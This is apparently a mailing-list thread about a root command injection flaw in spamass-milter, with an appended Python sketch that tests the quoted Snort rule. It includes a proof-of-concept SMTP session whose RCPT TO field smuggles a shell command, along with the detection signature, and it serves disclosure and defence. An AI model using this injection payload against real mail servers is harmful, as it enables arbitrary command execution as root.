On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> just a heads up: I don't know if there is a problem with SA milter, but
> there is a snort signature for it now.
>
> -------- Original Message --------
> Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
> Date: Mon, 8 Mar 2010 13:03:52 +0000
> From: Kevin Ross <kevros...@googlemail.com>
> To: emerging-s...@emergingthreats.net <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com>
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; nocase; content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
>
> Kev
The key is this: "If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied recipient (RCPT TO)."

The PoC is:

    $ nc localhost 25
    220 ownthabox ESMTP Postfix (Ubuntu)
    mail from: me () me com
    250 2.1.0 Ok
    rcpt to: root+:"|touch /tmp/foo"
    250 2.1.5 Ok
    $ ls -la /tmp/foo
    -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
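To see what the quoted ET rule actually catches, here is an added example (not from the thread or from Emerging Threats) that mimics its two content matches, including the nocase and within:15 modifiers, over a few constructed SMTP command lines; the sample lines, the window handling and the helper names are mine.

```python
# Constructed SMTP client commands (not captured traffic), one per line.
SAMPLE_SMTP = [
    b"MAIL FROM: me@me.com",
    b"RCPT TO: root+:\"|touch /tmp/foo\"",        # the recipient from the PoC above
    b"RCPT TO: root@localhost",                      # ordinary recipient, no alert
    b"RCPT TO: user+folder@example.com",             # plus-addressing alone is not enough
    b"rcpt to:root+:\"|id\"",                        # nocase: lowercase verb still matches
    b"RCPT TO: aaaaaaaaaaaaaaaa root+:\"|x\"",       # second content lies beyond within:15
]

FIRST = b"to:"          # content:"to|3A|"; nocase
SECOND = b'root+:"|'    # content:"root+|3A|\"|7C|"; nocase
WITHIN = 15             # within:15 -> SECOND must sit in the 15 bytes after FIRST ends


def matches_et_rule(payload: bytes) -> bool:
    """Return True if the payload satisfies both content matches of the rule.

    Both contents are compared case-insensitively (nocase). Snort's 'within'
    modifier restricts the search for the second content to the WITHIN bytes
    that follow the end of the first match; if that fails, the engine retries
    with the next occurrence of the first content, which is mirrored here.
    """
    hay = payload.lower()
    first, second = FIRST.lower(), SECOND.lower()
    start = 0
    while True:
        i = hay.find(first, start)
        if i < 0:
            return False
        end = i + len(first)
        if second in hay[end:end + WITHIN]:
            return True
        start = i + 1


def alerts(lines):
    """Filter a list of command lines down to those the rule would alert on."""
    return [line for line in lines if matches_et_rule(line)]


if __name__ == "__main__":
    for line in alerts(SAMPLE_SMTP):
        print("ALERT sid:1324412", line)
```

The rule keys on the literal bytes of the PoC recipient, so it documents this one payload shape rather than the underlying popen() of an untrusted RCPT TO; the thread's own text points at the real fix, which is not running spamass-milter with -x.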